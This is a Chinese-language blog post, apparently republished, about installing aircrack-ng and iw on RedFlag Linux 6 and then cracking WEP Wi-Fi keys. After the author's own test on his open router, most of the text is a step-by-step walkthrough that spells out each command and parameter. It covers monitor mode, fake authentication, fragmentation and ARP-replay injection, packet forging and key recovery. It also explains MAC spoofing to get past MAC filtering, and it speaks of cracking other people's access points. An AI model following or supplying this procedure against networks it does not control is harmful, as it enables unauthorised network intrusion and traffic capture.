歡迎您光臨本站 註冊首頁

RedFlag 6 sp2 下無線破解2(aircrack-ng)

←手機掃碼閱讀     火星人 @ 2014-03-29 , reply:0

RedFlag 6 sp2 下無線破解2(aircrack-ng)
前幾天完成了kismet在 RedFlag 6 sp2 下的安裝使用,昨天就考慮安裝無線破解工具,工具很多,
還是先用習慣的aircrack-ng ,現在最新版本己是aircrack-ng-1.0.tar.gz,可到http://www.aircrack-ng.org/doku.php?id=downloads#linux_packages
下載,
Current Sources
This tarball contains the latest Linux sources.
aircrack-ng-1.0.tar.gz
SHA1: 8a3c5b8e322ea11e5559109a9f9d668ad6aee5f0
MD5: dafbfaf944ca9d523fde4bae86f0c067

下載后打開終端,輸入tar vfx aircrack-ng-1.0.tar.gz解壓,再進入aircrack-ng-1.0目錄,依次輸入:
make
make install
正常的話就安裝成功了,如有錯誤,看下網頁說明,或留言,看我是否能解答。
再說下我的網卡是sagem xg-760N, zydas晶元,
在終端輸入airmon-ng 看無線網卡是否存在:
[root@rf6net ~]# airmon-ng
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy0]

設定網卡為監聽模式:
[root@rf6net ~]# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.437 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
[root@rf6net ~]# iwconfig wlan0 mode monitor

輸入測試:
[root@rf6net ~]# airmon-ng start wlan0 6
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3563 avahi-daemon
3570 avahi-daemon
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from
http://wireless.kernel.org/download/iw/iw-0.9.17.tar.bz2


有錯誤,用不了?還好有提示,就?上重新連線,去下載iw-0.9.17.tar.bz2 安裝:
[root@rf6net ~]# cd /root/aircrack
[root@rf6net aircrack]# ls
aircrack-ng-1.0
aircrack-ng-1.0.tar.gz
iw-0.9.9.tar.bz2
[root@rf6net aircrack]# tar fvx iw-0.9.9.tar.bz2
iw-0.9.9/
iw-0.9.9/.gitignore
iw-0.9.9/COPYING
iw-0.9.9/Makefile
iw-0.9.9/README
iw-0.9.9/genl.c
iw-0.9.9/info.c
iw-0.9.9/interface.c
iw-0.9.9/iw.8
iw-0.9.9/iw.c
iw-0.9.9/iw.h
iw-0.9.9/mesh.c
iw-0.9.9/mpath.c
iw-0.9.9/nl80211.h
iw-0.9.9/phy.c
iw-0.9.9/reg.c
iw-0.9.9/station.c
iw-0.9.9/util.c
iw-0.9.9/version.sh
[root@rf6net aircrack]# cd /root/aircrack/iw-0.9.9
[root@rf6net iw-0.9.9]# make

GEN version.h
CC iw.o
CC info.o
CC phy.o
CC interface.o
CC station.o
CC util.o
CC mpath.o
CC reg.o
CC mesh.o
CC genl.o
CC iw
[root@rf6net iw-0.9.9]# make install
GZIP iw.8
INST iw
INST iw.8

OK,安裝成功,再次運行測試:
airmon-ng start wlan0 6


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3563 avahi-daemon
3570 avahi-daemon
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy0]
(monitor mode enabled on mon0)
OK,己支持監聽模式了,再輸入測試:
[root@rf6net iw-0.9.9]# airodump-ng --ivs -w test -c 6 mon0
哈哈,熟悉的界面又出現了:

CH 6 ][ Elapsed: 8 mins ][ 2009-09-18 20:17

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

00:11:F5:35:19:F8 34 93 5090 798 1 6 54 OPN <

BSSID STATION PWR Rate Lost Packets Probes

00:11:F5:35:19:F8 00:60:B3:43:53:4D 0 0 - 0 0 14
(not associated) 00:80:87:F6:0D:23 77 0 - 1 0 76 dd-wrt
^C

l因為我的路由沒有設密碼,所以上面ENC 顯示的是 OPN,
明天改成加密的試下,順便說下,好象支持WAP加密破解了。
[root@rf6net ~]# aireplay-ng -1 0 -e dd-wrt -a 00:11:f5:35:19:f8 -h 00:60:B3:43:53:4D mon0
20:16:36 Waiting for beacon frame (BSSID: 00:11:F5:35:19:F8) on channel 6

20:16:36 Sending Authentication Request (Open System)

20:16:38 Sending Authentication Request (Open System)

20:16:40 Sending Authentication Request (Open System)

因為我的路由沒有設密碼,只是試下指令。
停止監聽模式,好重新連網。
不過有些網卡可能要重新啟動下。
[root@rf6net iw-0.9.9]# airmon-ng stop mon0 6


Interface Chipset Driver

wlan0 ZyDAS 1211 zd1211rw - [phy0]
mon0 ZyDAS 1211 zd1211rw - [phy0] (removed)

[root@rf6net iw-0.9.9]# airmon-ng stop wlan0 6


Interface Chipset Driver

wlan0 ZyDAS 1211 zd1211rw - [phy0]
(monitor mode disabled)







具體破解過程和在BK3 下用的aircrack-ng 一樣,
我這裡也就再貼一下簡單過程和說明:
———————————破解—————————————

以下是破解過程
WEP 破解
1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
新的第5步: aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs


我提供了樣板的文件供下載。

以下一一解釋:(運行這些命令都需要打開終端窗口,可以使用Ctrl+C 從文本文件Copy, 然後 Shift+Insert 粘貼入終端窗口)
1)ifconfig -a
這個命令用於找到自己的無線網卡的 Mac地址。請記錄下來備用。

2) airmon-ng start wifi0 6
這個命令用於將自己的無線網卡置於Monitor 模式,即類似一個AP的效果,因此可以有抓別人包的功能。
其中 wifi0 是我電腦裡面給無線網卡的 ,一般應該都是這個,第一個ifconfig -a命令可以看得到。
wifi0 後面的那個6 ,是需要破解的AP的頻道,如果不知道,可以在事前左下角開始菜單裡面,找到 第二項 Internet 下面的倒數第二個畫著 無線網的一個工具,用它可以看到那些需要破解的AP的頻道(Channel)。

運行命令成功以後,你會看到返回的提示顯示出現一個 Ath1(如果你是 Athoes的無線網卡的話就是這個,其他的可能不同,不過一般都是XXX1這樣)
這個就是你的用於破解的網卡代號

這個命令,簡而言之,就是把你的無線網卡置於監控模式,並且指定監控的頻道。
如果你發現弄錯了頻道,那麼沒關係,重新運行一遍就可以了,不過這個時候,可能就會變成 Ath2...Ath3 等等,但是好像最多運行三次,然後就會失敗。

3) airodump-ng --ivs -w name -c 6 ath1
這個命令比較關鍵,你運行以後,就會列出所有該頻道的AP。

其中,6 是指你需要監控的頻道,必須和第二個命令里的一樣, ath1是剛才第二步出現的別名。
這個命令運行以後,顯示的內容比較多,簡單介紹一下:
BSSID : 其實就是AP的Mac 地址
PWR: AP信號的大小,一般,低於10,就比較麻煩了,丟包情況嚴重,比較難破解
RXQ: 干擾的大小
Beacons:發送接受的包,參考信息,在跳說明有數據
#Data: 這個比較重要,是接受到可以用來破解的特殊包,如果一直不變,那麼,說明沒有客戶端連接,破解可能很麻煩,如果對方有大文件在下載,那麼這個跳的速度非常快,10來分鐘就可以有足夠的包來破解了,如果跳得很慢,那麼,就需要用一些特殊的方式來破解了。
CH:頻道
MB:網路連接速度 54就是54MB
ENC, CIPHER,AUTH
這些是加密方式,我們這次只討論顯示為 WEP 和 WEP+ OPN的
如果顯示 WPA TKIP 啥的,只能密碼窮舉破解,個人認為希望不大。
ESSID: 這個是AP的名字,需要用到的。如果是中文貌似會出問題。因此為了阻擋別人破解,可以用中文的ESSID


過一會兒,下面會顯示哪些客戶端連接到了哪些AP,針對有些Mac地址加密的,很容易模擬對方客戶端的Mac從而騙進去,所以不要簡單地相信Mac限制功能。

這個窗口就開著好了,不用關閉,以後的命令,需要重新打開一個終端窗口操作。


4)aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
這一步開始,我們要做一些真正的破解工作,主要是針對那些客戶端僅僅連接,沒什麼流量的AP,這種AP,#Data的增長非常慢,往往需要很長的時間才有可能取得足夠的包(一般5位的密碼需要10000個包左右,更多的密碼就要更多的。。。。)這個時候就需要 aireplay-ng 出面了,顧名思義,這個軟體就是 Replay,也就是說,模擬發包。

首先解釋命令:
-e ap_essid 就是 -e 之後加上你需要破解的essid ,比如 TP-LINK , linksys 啥的,注意大小寫。
-a ap_mac 就是 -a 之後加上你需要破解的AP的Mac地址,第三步BSSID就可以看得到。不需要 :哦。
-h XXXXXXXXXX 就是 -h 之後,加上你的無線網卡的 Mac地址, 在第一步你可以得到。
ath1 ,上面解釋過了。
一個樣板例子:
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1

這裡有個小的建議,大家可以把以上的命令,都記錄在一個文件里,然後把裡面的XXXXXXXX都用自己的網卡Mac地址替換掉,這樣就不需要每次都輸入自己的Mac地址了。每次都可以用Copy Paste的方式來輸入,這樣可以有效防止什麼1 和 l , O和0 的混淆。

這一條命令,是用欺騙的方式,連接上那個AP,因此,如果網路信號不好,可能會執行不成功。
如果成功了,那麼會顯示Successful :> 字樣。否則,請讓信號強度大於10。

5)aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
上一條成功以後,我們需要開始收集那些需要的數據包,才能夠進行模擬,並且破解。
所謂的需要的數據包,就是 #Data的數據,如果 #Data一直是0,那麼可能會很麻煩,最好的情況是 #Data緩慢增長的這種情況。

解釋一下
-b ap_mac 就是你需要破解的AP的Mac 地址,從第三步那裡的 BSSID可以找得到。
-h XXXXXXXXXX 就是你自己網卡的Mac地址。
Ath1 和上面一樣。。。。。

這一條命令的執行,和#data包有關,如果#Data 沒有增加,則這個命令會一直執行,直到捕獲一個#Data包。
捕獲以後,程序會問你是否需要用這個包來模擬攻擊。回答Y即可。
如果攻擊成功,則會顯示成功,失敗往往是因為信號太差造成的, 如果攻擊失敗(往往是捕獲的包有問題),程序重試N次以後,或自動重新開始捕捉包,繼續進行即可。

等成功完成以後,會顯示一個文件名:fragment-XXXXX-XXXXXX.xor
這個文件名,XXXXX裡面是數字,是一個文件。馬上會用得到。

這一步是最有可能失敗的一步,盡量保持信號好一點。

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

第六步,參數比較多,解釋一下:
-a ap_mac 是待破解的AP的Mac地址,
-h XXXXXXXXX 是你自己的無線網卡Mac地址
fragment-XXXXX-XXXXXX.xor 就是第五步顯示的那個文件名。
這一步會很快做完, 顯示生成文件到 mrarp啥的,其實就是破解包的準備過程。
7) aireplay-ng -2 -r mrarp -x 1024 ath1
這一步沒哈可以修改的,參數解釋一下
ath1 是 你的無線網卡的名字
1024 是攻擊速度,1024是最大值了,如果你的無線網卡不是MiniPCI的,個人建議設為 512 ,這樣不容易死機。
當這一步開始執行,你會看到 第一個終端窗口裡面,你破解的那個AP後面的 #Data在飛速增長,一般是 200個/s的速度,我們只需等待即可
8)我們可以新打開一個終端窗口,當 #Data達到 10000個的時候,就可以測試破解了,很多密碼都可以 10000左右#Data就算出來
新窗口中運行:
aircrack-ng -n 64 -b ap_mac name-01.ivs
解釋一下,
-b ap_mac 對方AP的Mac地址
name-01.ivs 其實是第三步自動生成的一個文件, 如果你多次運行了第三步,那麼,可能會生成多個 name-XX.ivs文件, 你可以到對應的文件夾里看一下(就在桌面上的第一個文件夾圖標里),找到XX最大的那個,就是你當前正在使用的這個文件。

-n 64 是指破解64位的密碼,如果10萬以上Data都破解不出來,那就試試 -n 128,估計這個兄弟用了128位加密。

運行以後,如果運氣好,一會兒就會顯示破解出來的密碼,同時會顯示 對應的Assic碼,如果不是標準Assic碼,就是一串數字,記錄下來,搞掂。
運氣不好的情況,這個程序會繼續等待更多的#Data,等到了,就會重新計算一次密碼。

本教程只針對 WEP 密碼的破解,而且,最好有得到認證的客戶端連接在這個AP上,如果沒有,有些AP(比如TP-LINK)能夠被破解,某些可能就無法破解。



[火星人 ] RedFlag 6 sp2 下無線破解2(aircrack-ng)已經有948次圍觀

http://coctec.com/docs/linux/show-post-193837.html